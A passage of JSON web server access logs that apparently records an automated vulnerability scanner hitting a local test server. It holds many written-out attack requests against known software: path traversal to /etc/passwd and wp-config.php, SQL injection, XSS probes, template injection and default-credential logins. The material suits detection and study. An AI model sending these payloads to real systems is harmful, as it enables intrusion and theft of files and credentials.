Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WAN_wan.htm?.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.206","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.188","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aj.html?a=devi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.187","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/email-subscribers HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server/status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.201","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"{\x22username\x22: \x22testpoc\x22, \x22has_admin_role\x22: true, \x22password\x22: \x22TestPoc!\x22, \x22email\x22: \x22testpoc@example.com\x22, \x22realname\x22: \x22poc\x22}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/users HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.210","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.202","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"yuzo_related_post_css_and_style=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"_charset_=utf-8&j_username=aparker@geometrixx.info&j_password=aparker&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.215","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"vfb-content=entries&format=csv&entries_form_id=1&entries_start_date=0&entries_end_date=0&submit=Download+Export+File","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin.php?page=vfb-export HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.069","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1/wp-admin/admin.php?page=vfb-export", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/authportal/bounce.php?url=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.236","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /AirWatch/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configprops HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.075","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"\x0D\x0A\x0D\x0A login\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A cobbler\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A cobbler\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.090","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WAN_wan.htm?.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.103","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.237","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.202","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"more=0&host=0&username=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=&db=&lang=en_us&expire=3","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?action=login.index HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/configprops HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gitlab/build_now%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.201","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /search.php?searchtype=5 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.204","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmodule-ee/login.seam HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.259","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/initializers/secret_token.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.bzr/branch/branch.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/add-on/business-continuity/api/cipher.aes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/acf/v3/options/a?id=active&field=plugins HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.002","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pandora_console/attachment/pandora_chat.log.json.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(202072102)))),@`%27` HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.198","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /WEB_VMS/LEVEL15/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.213","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /base_import/static/c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /confluence HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"username=admin&password=123","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/verify HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"127.0.0.1/login/index", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/static/c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.224","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd 